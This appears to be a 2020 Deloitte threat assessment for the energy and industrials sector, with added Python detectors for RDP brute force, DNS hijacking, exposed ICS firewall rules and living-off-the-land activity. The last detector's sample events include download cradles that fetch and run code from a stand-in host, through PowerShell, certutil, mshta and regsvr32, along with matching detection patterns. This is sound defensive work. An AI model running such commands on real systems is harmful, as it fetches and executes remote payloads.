Energy Resources & Industrials: Recent Observations & Trends

Energy Resources & Industrials
Recent observations & trends

Global Threat Assessment by Deloitte Global Cyber Threat Intelligence.

Issue date: September 2020 | Industry: ERI | Region: All


Copyright © 2019 Deloitte Development LLC. All rights reserved.
Threat Landscape | Energy and Resources

Executive summary
The Energy, Resources, and Industrials sector (ERI) is exposed to multiple types of risk across
the cyber threat landscape. The ERI sector is composed of organizations in the power and
utilities, oil and gas, industrial control systems (ICS), construction, and mining and minerals
industries. The ERI sector is a target for multiple types of threat actor and will continue to be a
substantial target because of the sector's significant role in critical infrastructure and the key
economic importance of the services these industries provide. Deloitte has observed two
primary motives behind threat actor targeting and explores five core threats to the ERI
industry below.

Threat actors, motives, and core threats

Threat actors:
- Advanced persistent threat (APT) groups
- Cyber criminals

Motives:
- Cyber espionage: Nation-state threat actors seek economic, political, and military advantages
  by stealing proprietary information and exploiting vulnerable entities in the ERI industry. By
  stealing sensitive proprietary data, R&D costs and schedules can be reduced significantly by
  utilizing the work already done by the victim.
- Financial gain: Threat actors operating within the underground criminal ecosystem obtain
  access to ERI target networks and sell access to the sensitive proprietary and customer data of
  ERI organizations.

Core threats:
- Remote Access Trojans (RATs)
- Ransomware
- DNS hijacking
- Threats to Industrial Control Systems (ICS)
- Cross-industry threats

Observation 1 | Remote Access Trojans (RATs)


A variety of threat actors use custom built and commodity RATs to strategically target organizations in
the ERI industry and beyond to access client data or networks.

____________

Threat actor
State-sponsored actors: State-sponsored threat actors use both custom-built and commodity RATs,
which give them the capability to target organizations within the ERI industry in state-sponsored
campaigns and attacks.

Cyber criminals: Cyber criminals use commodity RATs to steal access credentials and other sensitive or
proprietary data to sell on underground forums and marketplaces for financial gain.

Threat motivator
Cyber espionage: Threat actors focused on targeting the ERI sector mainly do so to obtain sensitive
proprietary data. State-sponsored threat actors or APT groups target sensitive proprietary data to
improve their own infrastructure and programs within the ERI sector. One benefit of cyber espionage
to the attacker, especially in the industrial sectors, is that R&D cost and time can be reduced
significantly by utilizing the work already done by the victim.

Financial gain: Cyber criminal threat actors target the networks and sensitive proprietary data of ERI
organizations to sell access or data on Dark Web underground forums.

Lessons learned
ERI organizations will remain a target of advanced threat actors, not only for their sensitive data, but
also because they can be leveraged to impact critical infrastructure.

Tactics, techniques, & procedures


Targeted spear-phishing campaigns typically result in the delivery of RATs, which enable persistent
access as well as lateral movement. Credential-based attacks on exposed remote services such as RDP
are also popular for initial access. Threat actors seek to compromise account credentials, particularly
for administrators, to enable lateral movement and ultimately gain access to the critical infrastructure
of ERI organizations as well as their sensitive proprietary data. Legitimate tools and techniques, such as
PowerShell, can enable actors to evade many detective controls.
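The credential attacks on exposed RDP described above leave a recognizable trace in the Windows Security log: failed logons (event 4625) with LogonType 10 (RemoteInteractive) from one source address, followed, if the attacker succeeds, by a 4624 success from the same address. The following detection logic is an added example and not code from the report; the event list is constructed for illustration, the field names follow the Windows Security log, and the thresholds are assumptions to tune per environment.

```python
"""Detect credential attacks against exposed RDP in Windows Security events.

Added example, not code from the report. The EVENTS list is constructed for
this example; its field names follow the Windows Security log (4625 = failed
logon, 4624 = successful logon, LogonType 10 = RemoteInteractive, i.e. RDP).
The thresholds are assumptions to tune per environment.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RDP_LOGON_TYPE = 10
WINDOW = timedelta(minutes=10)    # assumption: correlation window
BRUTE_FORCE_FAILURES = 5          # assumption: failures on one account from one IP
SPRAY_DISTINCT_ACCOUNTS = 3       # assumption: distinct accounts failed from one IP
FAILURES_BEFORE_SUCCESS = 3       # assumption: failures preceding a success from the same IP


def _ev(time, event_id, user, ip, logon_type=RDP_LOGON_TYPE):
    return {"time": time, "EventID": event_id, "LogonType": logon_type,
            "TargetUserName": user, "IpAddress": ip}


# Constructed sample events (not real log data).
EVENTS = [
    # 203.0.113.7: five tries on Administrator, two more accounts, then a success.
    _ev("2020-09-01T08:00:01", 4625, "Administrator", "203.0.113.7"),
    _ev("2020-09-01T08:00:05", 4625, "Administrator", "203.0.113.7"),
    _ev("2020-09-01T08:00:09", 4625, "Administrator", "203.0.113.7"),
    _ev("2020-09-01T08:00:14", 4625, "Administrator", "203.0.113.7"),
    _ev("2020-09-01T08:00:20", 4625, "Administrator", "203.0.113.7"),
    _ev("2020-09-01T08:00:31", 4625, "svc_backup", "203.0.113.7"),
    _ev("2020-09-01T08:00:36", 4625, "jsmith", "203.0.113.7"),
    _ev("2020-09-01T08:01:02", 4624, "jsmith", "203.0.113.7"),
    # 198.51.100.12: a legitimate user who mistyped a password once.
    _ev("2020-09-01T09:15:00", 4625, "mperez", "198.51.100.12"),
    _ev("2020-09-01T09:15:20", 4624, "mperez", "198.51.100.12"),
    # Console logon failure (LogonType 2): not RDP, ignored by this check.
    _ev("2020-09-01T09:30:00", 4625, "mperez", "-", logon_type=2),
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def detect_rdp_attacks(events, window=WINDOW):
    """Return alerts for brute force, password spraying, and an RDP success
    that follows a burst of failures from the same source IP."""
    by_ip = defaultdict(list)
    for e in events:
        if e["LogonType"] == RDP_LOGON_TYPE:
            by_ip[e["IpAddress"]].append(e)

    alerts = {}  # keyed so overlapping windows do not produce duplicate alerts
    for ip, evs in by_ip.items():
        evs.sort(key=_ts)
        failures = [e for e in evs if e["EventID"] == 4625]

        # Each failure opens a window; count failures per account inside it.
        for i, first in enumerate(failures):
            per_user = defaultdict(int)
            for f in failures[i:]:
                if _ts(f) - _ts(first) > window:
                    break
                per_user[f["TargetUserName"].lower()] += 1
            for user, n in per_user.items():
                key = ("brute_force", ip, user)
                if n >= BRUTE_FORCE_FAILURES and n > alerts.get(key, {}).get("count", 0):
                    alerts[key] = {"type": "brute_force", "ip": ip, "user": user, "count": n}
            key = ("password_spray", ip)
            if (len(per_user) >= SPRAY_DISTINCT_ACCOUNTS
                    and len(per_user) > len(alerts.get(key, {}).get("accounts", []))):
                alerts[key] = {"type": "password_spray", "ip": ip, "accounts": sorted(per_user)}

        # A success preceded by failures from the same IP is the highest-fidelity signal.
        for s in (e for e in evs if e["EventID"] == 4624):
            prior = [f for f in failures if _ts(s) - window <= _ts(f) < _ts(s)]
            if len(prior) >= FAILURES_BEFORE_SUCCESS:
                user = s["TargetUserName"].lower()
                alerts[("success_after_failures", ip, user)] = {
                    "type": "success_after_failures", "ip": ip, "user": user, "count": len(prior)}

    return sorted(alerts.values(), key=lambda a: (a["ip"], a["type"]))


if __name__ == "__main__":
    for alert in detect_rdp_attacks(EVENTS):
        print(alert)
```

The single mistyped password from 198.51.100.12 produces no alert, while the source at 203.0.113.7 triggers all three: a brute-force alert on Administrator, a password-spray alert across three accounts, and the high-fidelity "success after failures" alert for jsmith. The last one is the alert worth paging on, since it means a valid account is now in the attacker's hands and the lateral movement described above can begin.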

Observation 2 | Ransomware
In a ransomware attack, threat actors seek to encrypt victim machines and networks for either financial
gain or destructive purposes. Ransomware is used by a variety of threat actors across all industries and
will likely continue to be used to target organizations in the ERI sector in the future.

____________

Threat actor
State-sponsored actors: State-sponsored threat actors are capable of conducting successful attacks
using ransomware for the purposes of disrupting or destroying targeted networks. In these cases there
is typically no decryption key available.

Cyber criminal actors: Cyber criminal threat actors are capable of encrypting victim machines and
networks, and target organizations and victims that will give them the maximum financial gain.

Threat motivator
Financial gain: The critical infrastructure of the ERI sector is an opportunistic target for financially
motivated ransomware actors, since operational downtime increases the pressure to pay.

Destructive purposes: The critical infrastructure of the ERI sector is a deliberate target for threat
actors repurposing ransomware for destructive purposes. State-sponsored actors may deploy
ransomware with no intention of ever providing the decryption key, or use code that never produces a
decryption key at all, which makes the malware a wiper in all but name.

Lessons learned
Ransomware can be used to target organizations in the ERI sector and will continue to be used by
threat actors to impact the sector for destructive purposes in addition to financial gain. All companies
and organizations should be aware of and understand how ransomware could impact their corporate
machines and networks.

Tactics, techniques, & procedures


For ransomware attacks, spear phishing emails are the main vector of attack.


Observation 3 | DNS Hijacking


DNS (Domain Name System) hijacking attacks tamper with DNS records, whether at the registrar, in the
authoritative zone, or on a compromised resolver, in order to point victims towards rogue infrastructure
that imitates mail, VPN, and other remote services.

____________

Threat actor
State-sponsored actors: DNS hijacking targets and incidents reflect the continued escalation and
sophistication of nation state cyber espionage/warfare from both a strategy and capability standpoint.

Threat motivator
Cyber espionage: DNS hijacking attacks focus on impacting many victims at once. Threat actors use
them to redirect as many victims as possible to sites that install malware on victim machines and
systems, or that steal credentials.

Lessons learned
DNS hijacking attacks function as man-in-the-middle (MitM) attacks used to harvest credentials: the
rogue host often proxies traffic through to the legitimate service so that the victim notices nothing.
Keep systems updated and patched. Do not click suspicious links in emails or on social media, and
change the default administrator username/password on routers, since a compromised router resolver
is one way lookups get hijacked. Avoid using public Wi-Fi networks to send or receive sensitive
information or to log into sites that require a username or password. Implement Domain Name
System Security Extensions (DNSSEC): domain owners sign their zones and publish the matching DS
records with the registrar, which lets validating DNS resolvers verify the authenticity of responses for
those domains. DNSSEC does not by itself monitor traffic, so domain owners should separately monitor
their authoritative records (NS, A, MX) and their registrar accounts for unauthorized changes, and
protect registrar accounts with multi-factor authentication. A VPN that tunnels DNS queries to the VPN
provider's resolver bypasses the local router's DNS settings, which protects against a compromised
local resolver but not against changes made to the authoritative records themselves.
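Monitoring authoritative records for unauthorized change, as recommended above, is a small periodic job: keep a signed-off baseline of the NS, MX and A records for the domain and its mail and VPN hosts, resolve them from outside the network, and alert on any difference. The following is an added example and not code from the report; the domain, addresses and the "observed" answers are constructed (documentation address ranges and the .test TLD), and the resolver is a pluggable function so the check runs offline here and against a real resolver in production.

```python
"""Detect DNS hijacking by diffing a domain's live records against a baseline.

Added example, not code from the report. The domain names, addresses and
the OBSERVED answers are constructed (documentation ranges and the .test
TLD); resolve() is pluggable so the check runs offline here and against a
real resolver in production.
"""
import socket

# Constructed baseline: the records the domain owner signed off on.
BASELINE = {
    ("example-utility.test", "NS"): {"ns1.example-utility.test", "ns2.example-utility.test"},
    ("example-utility.test", "MX"): {"mail.example-utility.test"},
    ("mail.example-utility.test", "A"): {"192.0.2.25"},
    ("vpn.example-utility.test", "A"): {"192.0.2.44"},
}

# Constructed answers simulating a hijack: one name server swapped at the
# registrar and the VPN host pointed at rogue infrastructure.
OBSERVED = {
    ("example-utility.test", "NS"): {"ns1.example-utility.test", "ns-rogue.test"},
    ("example-utility.test", "MX"): {"mail.example-utility.test"},
    ("mail.example-utility.test", "A"): {"192.0.2.25"},
    ("vpn.example-utility.test", "A"): {"198.51.100.77"},
}

# NS changes imply registrar or zone compromise and affect every record below them.
SEVERITY = {"NS": "critical", "MX": "high", "A": "high"}


def constructed_resolver(name, rtype):
    """Offline stand-in for a resolver: returns the constructed OBSERVED answers."""
    return set(OBSERVED.get((name, rtype), set()))


def live_resolver(name, rtype):
    """System-resolver lookup using only the standard library. Handles A records;
    NS and MX lookups need a DNS library such as dnspython."""
    if rtype != "A":
        raise NotImplementedError(f"{rtype} lookups need a DNS library")
    return {info[4][0] for info in socket.getaddrinfo(name, None, socket.AF_INET)}


def check_records(baseline, resolve):
    """resolve(name, rtype) -> set of answers. Return one finding per record
    whose current answers differ from the baseline, with the added/removed values."""
    findings = []
    for (name, rtype), expected in sorted(baseline.items()):
        current = set(resolve(name, rtype))
        if current == expected:
            continue
        findings.append({
            "name": name, "type": rtype,
            "severity": SEVERITY.get(rtype, "medium"),
            "expected": sorted(expected), "observed": sorted(current),
            "added": sorted(current - expected), "removed": sorted(expected - current),
        })
    return findings


if __name__ == "__main__":
    for finding in check_records(BASELINE, constructed_resolver):
        print(finding["severity"].upper(), finding["name"], finding["type"],
              "added", finding["added"], "removed", finding["removed"])
```

Run the check from more than one network vantage point, since a hijack on a single compromised resolver will only be visible from behind that resolver. A change to the NS set is the finding to treat as an incident rather than a misconfiguration: an attacker who can change name servers at the registrar can also change the DS records, so DNSSEC validation alone will not catch that case.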

Tactics, techniques, & procedures


Threat actors use DNS hijacking to impact the maximum number of victims. Once threat actors control
the DNS records, they redirect victims to a website or system under their control that appears
legitimate but delivers malware, or presents a fake login page or advertisements that steal sensitive
proprietary data or account credentials.


Observation 4 | Threats to Industrial Control Systems (ICS)

ICS used in ERI processes are becoming more sophisticated and interconnected, which makes ICS more
vulnerable to attack as sensors and controllers continue to be linked to enterprise networks and the
public internet, in efforts to make operations more convenient and efficient. These efforts have actually
significantly increased risk to ICS by establishing pathways for remote access to critical systems.

____________

Threat actor
State-sponsored actors: State-sponsored threat actors use industrial control system (ICS)-themed lures
to deliver RATs to ERI organizations.

Threat motivator
Service disruption, destruction, and cyber espionage: State-sponsored threat actors involved in
campaigns targeting ICS in the ERI sector focus on disrupting or destroying critical infrastructure ICS
networks and devices. Additionally, theft of sensitive proprietary data is a motivator for these actors.

Lessons learned
Efforts to make ICS more sophisticated and interconnected for use among organizations in the ERI
sector have significantly increased risk by establishing pathways for remote access to critical systems.
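The "pathways for remote access" the two paragraphs above warn about are, concretely, firewall rules that let traffic originate outside the control zone and terminate on a controller, an HMI or a SCADA server. The audit below is an added example and not code from the report: it walks a rule set and flags every allow rule into the control zone whose source is anything other than the OT DMZ. The zone layout, rule format and rule list are constructed; the port-to-protocol map covers common ICS protocols (Modbus/TCP 502, DNP3 20000, S7comm 102, EtherNet/IP 44818, OPC UA 4840) and remote-access services and is an assumption to extend for a given plant.

```python
"""Audit firewall rules for remote-access paths into an ICS/control zone.

Added example, not code from the report. The zone layout, the rule format
and the RULES list are constructed; the port-to-protocol map covers common
ICS protocols and remote-access services and is an assumption to extend.
"""
import ipaddress

# Constructed zone model: most-specific prefix wins, so anything not in an
# internal zone is treated as Internet.
ZONES = {
    "internet": ["0.0.0.0/0"],
    "enterprise": ["10.10.0.0/16"],
    "ot_dmz": ["10.20.0.0/24"],      # jump hosts, historians, patch relays
    "control": ["10.30.0.0/16"],     # PLCs, RTUs, HMIs, SCADA servers
}
# Only the OT DMZ (or the control zone itself) may initiate traffic into control.
ALLOWED_INTO_CONTROL = {"ot_dmz", "control"}

ICS_PORTS = {102: "S7comm", 502: "Modbus/TCP", 4840: "OPC UA", 20000: "DNP3", 44818: "EtherNet/IP"}
REMOTE_ACCESS_PORTS = {22: "SSH", 3389: "RDP", 5900: "VNC"}

# Constructed rule set: rule 1 exposes Modbus to the Internet, rule 2 lets the
# enterprise LAN RDP straight to an HMI, rules 3 and 4 are the intended path.
RULES = [
    {"id": 1, "src": "any", "dst": "10.30.0.0/16", "dport": 502, "action": "allow"},
    {"id": 2, "src": "10.10.0.0/16", "dst": "10.30.5.10/32", "dport": 3389, "action": "allow"},
    {"id": 3, "src": "10.20.0.0/24", "dst": "10.30.0.0/16", "dport": 502, "action": "allow"},
    {"id": 4, "src": "10.10.0.0/16", "dst": "10.20.0.10/32", "dport": 3389, "action": "allow"},
    {"id": 5, "src": "any", "dst": "10.30.0.0/16", "dport": "any", "action": "deny"},
]


def zone_of(cidr):
    """Map an address or network ('any' allowed) to the zone with the longest matching prefix."""
    net = ipaddress.ip_network("0.0.0.0/0" if cidr == "any" else cidr, strict=False)
    best, best_len = None, -1
    for zone, prefixes in ZONES.items():
        for p in prefixes:
            z = ipaddress.ip_network(p)
            if net.subnet_of(z) and z.prefixlen > best_len:
                best, best_len = zone, z.prefixlen
    return best


def audit(rules):
    """Return a finding for every allow rule that lets a zone other than the OT DMZ
    initiate connections into the control zone."""
    findings = []
    for r in rules:
        if r["action"] != "allow":
            continue
        src, dst = zone_of(r["src"]), zone_of(r["dst"])
        if dst != "control" or src in ALLOWED_INTO_CONTROL:
            continue
        port = r["dport"]
        service = ICS_PORTS.get(port) or REMOTE_ACCESS_PORTS.get(port) or str(port)
        severity = "critical" if src == "internet" or port == "any" else "high"
        findings.append({"rule": r["id"], "src_zone": src, "dst_zone": dst,
                         "service": service, "severity": severity})
    return findings


if __name__ == "__main__":
    for finding in audit(RULES):
        print(finding)
```

Rule 4 is not flagged because it terminates in the DMZ, where a jump host can enforce multi-factor authentication and session recording before anything reaches a controller; rule 2 is flagged because it skips that hop. Export the real rule base from the firewall vendor's management API into the same dict shape and the check becomes a nightly control.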

Tactics, techniques, & procedures


State-sponsored campaigns often use malicious attachments that appear to be ICS themed, as well as
watering holes, and publicly available remote access tools, to deliver malware. Campaigns requiring
long-term access include the use of RATs and other tools to collect information—or alter content—and to
move laterally within a network. Some threat actors may seek to disrupt the availability of ICS in the
ERI sector, for instance through the use of Denial-of-Service (DoS) attacks against critical ERI
infrastructure, as observed in the alleged Iranian threat group Parastoo cyber attack in early June 2019
that caused a power outage in Saudi Arabia after an attack on SCADA systems.



Observation 5 | Cross-industry threats

ERI organizations face numerous cross-industry threats which include information stealing malware,
threats to cloud services, and supply chain attacks.

____________

Threat actor
Cyber criminals & APTs: Both types of threat actors utilize information stealing malware, supply chain
attacks, and targeting of cloud services to target cross-industry networks and data, including the ERI
sector, to fulfill their respective agendas.

Threat motivator
Financial gain & cyber espionage: ERI organizations process sensitive proprietary data, which cyber
criminals seek to monetize on the dark web or underground forums. The same sensitive data is also
targeted by state-sponsored threat actors to support national intelligence collection requirements or
gain competitive market advantages.

Lessons learned
Organizations in the ERI sector continue to be attractive targets to cyber criminals and state-sponsored
threat actors across all industries and geographic regions due to the unique information they possess.
As such, they are constantly confronted by both commodity and sophisticated cyber threats.

Tactics, techniques, & procedures


The majority of observed attacks on organizations within the ERI sector involve spear-phishing emails
using themed document lures with embedded malware or redirections to login pages designed to steal
user credentials or deliver additional malware. RATs and information stealers are often combined with
“living off the land” abuse of legitimate operating system utilities as actors seek to move laterally
through a victim network, maintain persistent access, and exfiltrate data. Valid accounts remain of
value throughout the entire intrusion lifecycle.
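The "living off the land" activity described above (and the PowerShell abuse noted under Observation 1) is usually visible in process-creation telemetry rather than in file-based antivirus: a document-lure chain shows up as an Office application spawning a script host, and the payload stage shows up as an encoded PowerShell command, a certutil download, an mshta or regsvr32 call fetching remote content. The following is an added example and not code from the report; the process events, user names, paths and URLs are constructed, and the pattern set is a starting point, not a vendor rule set.

```python
"""Flag living-off-the-land process activity in process-creation events.

Added example, not code from the report. The EVENTS list, users, paths and
URLs are constructed; the field names mimic Windows event 4688 / Sysmon
event 1, and the CMDLINE_RULES patterns are an assumption to extend.
"""
import base64
import re

# tag -> pattern matched against the command line and any decoded PowerShell.
CMDLINE_RULES = {
    "encoded_powershell": re.compile(
        r"(?:^|\s)-e(?:ncodedcommand|nco|nc|n|c)?\s+([A-Za-z0-9+/=]{20,})", re.I),
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|Start-BitsTransfer", re.I),
    "certutil_download": re.compile(r"certutil(?:\.exe)?\b.*-urlcache", re.I),
    "mshta_remote": re.compile(r"mshta(?:\.exe)?\b.*https?://", re.I),
    "regsvr32_remote_scriptlet": re.compile(r"regsvr32(?:\.exe)?\b.*/i:https?://", re.I),
}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}


def _ps_encode(script):
    """Build an -EncodedCommand argument as PowerShell expects it (UTF-16LE, base64).
    Used only to construct the sample event below."""
    return base64.b64encode(script.encode("utf-16le")).decode()


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _proc(parent, image, cmdline, user="CORP\\jsmith"):
    return {"EventID": 4688, "User": user, "ParentImage": parent, "Image": image,
            "CommandLine": cmdline}


SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')"
WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
SYS32 = r"C:\Windows\System32"
PS = SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events (not real telemetry).
EVENTS = [
    _proc(WINWORD, PS, "powershell.exe -nop -w hidden -enc " + _ps_encode(SAMPLE_SCRIPT)),
    _proc(SYS32 + r"\cmd.exe", SYS32 + r"\certutil.exe",
          r"certutil.exe -urlcache -split -f http://203.0.113.9/x.exe C:\Users\Public\x.exe"),
    _proc(WINWORD, SYS32 + r"\mshta.exe", "mshta.exe http://203.0.113.9/p.hta"),
    _proc(r"C:\Windows\explorer.exe", PS, "powershell.exe -Command Get-Service",
          user="CORP\\admin01"),                       # benign administration
    _proc(SYS32 + r"\cmd.exe", SYS32 + r"\regsvr32.exe",
          "regsvr32.exe /s /n /u /i:http://203.0.113.9/s.sct scrobj.dll"),
]


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand, or None if there is none."""
    m = CMDLINE_RULES["encoded_powershell"].search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(events):
    """Return one finding per event that matches any rule or the Office-spawns-
    script-host relationship; the decoded PowerShell is included so the analyst
    sees the real command rather than a base64 blob."""
    findings = []
    for e in events:
        cmdline = e["CommandLine"]
        decoded = decode_encoded_command(cmdline)
        text = cmdline + ("\n" + decoded if decoded else "")
        tags = [tag for tag, rx in CMDLINE_RULES.items() if rx.search(text)]
        if _basename(e["ParentImage"]) in OFFICE_APPS and _basename(e["Image"]) in SCRIPT_HOSTS:
            tags.append("office_child_process")
        if tags:
            findings.append({"user": e["User"], "image": _basename(e["Image"]),
                             "tags": tags, "decoded": decoded, "command_line": cmdline})
    return findings


if __name__ == "__main__":
    for finding in analyse(EVENTS):
        print(finding["image"], finding["tags"], finding["decoded"] or "")
```

The administrator's plain `Get-Service` call produces no finding, which is the point of pairing command-line patterns with the parent-process relationship: PowerShell itself is legitimate, while PowerShell launched by Word with a hidden window and an encoded download cradle is not. Matching the rules against the decoded script as well as the raw command line is what catches the cradle in the first event.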



This presentation contains general information only and Deloitte is not, by means of this presentation, rendering
accounting, business, financial, investment, legal, tax, or other professional advice or services. This presentation is not a
substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may
affect your business. Before making any decision or taking any action that may affect your business, you should consult a
qualified professional advisor.

Deloitte shall not be responsible for any loss sustained by any person who relies on this presentation.

As used in this document, "Deloitte" means Deloitte & Touche LLP, a subsidiary of Deloitte LLP. Please see www.deloitte.com/us/about for a detailed
description of our legal structure. Certain services may not be available to attest clients under the rules and regulations of public accounting.
